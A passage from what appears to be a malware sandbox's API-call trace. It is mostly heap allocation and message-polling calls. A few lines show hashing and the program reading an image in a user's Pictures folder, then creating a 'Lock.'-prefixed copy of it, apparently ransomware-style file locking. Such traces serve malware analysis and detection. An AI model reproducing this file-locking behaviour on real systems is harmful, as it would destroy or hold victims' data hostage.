out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0255.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0255.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0255.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0255.137] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0255.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.138] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.138] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.139] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.148] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.149] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0255.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.149] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.149] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.150] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.150] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.150] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0255.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0255.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0255.151] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0255.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0255.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0255.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.152] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0255.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/FSvM9zg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fsvm9zg.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0255.155] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.155] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0255.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0255.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.156] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.156] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.156] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0255.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0255.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0255.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.158] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0255.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0255.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0255.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0255.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.FSvM9zg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.fsvm9zg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0255.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0255.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.160] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.161] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.161] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.161] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.162] HeapFree (in: hHeap=0x25c0000, 